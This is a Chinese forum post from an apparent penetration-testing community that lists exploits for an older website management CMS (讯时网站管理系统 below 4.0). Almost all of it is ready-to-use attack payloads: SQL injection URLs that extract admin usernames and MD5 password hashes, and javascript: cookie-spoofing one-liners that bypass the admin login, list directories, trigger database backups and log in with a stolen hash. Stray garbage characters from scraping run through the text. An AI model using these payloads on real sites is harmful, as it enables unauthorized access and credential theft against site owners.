中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入
$ V2 g8 |4 _& L& Q1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2# \, p' ~' d# i7 }
0 C; H) }2 f; s) V$ n6 }
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
0 Z8 Q5 M* m( C3 u第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin( ]# j( l% E4 a: g/ V0 ^8 R; H' [
可得到用户名和MD5加密码的密码。
1 @. }) v* X. X1 S0 r  P3 }
' F! V; C6 w; U  o# e二、cookies欺骗
, ?/ V+ o( B# ~7 d6 f9 s: H- S
0 g0 L0 f# K( r. m/ f1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
+ p  Y3 C. q9 G1 Njavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"* b9 Z+ X# l% S

+ c8 G% U8 z: j, \1 E7 f9 z2、列目录.
6 Y$ q7 d1 l: Z  rjavascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."& v. R; W) k4 b7 f

" r9 T5 B* u, Q, ~3 r  ^, }3、数据库备份(适用性好像比较低.) $ v8 b' o/ _0 Q
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
; o. P/ s3 x4 ]( `
$ X5 C( C+ T" _8 @' H4、得到MD5密码解不了密进后台方法
$ m0 J1 I- A+ ]. {javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"! g3 d' }; f9 A. u1 u( k





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2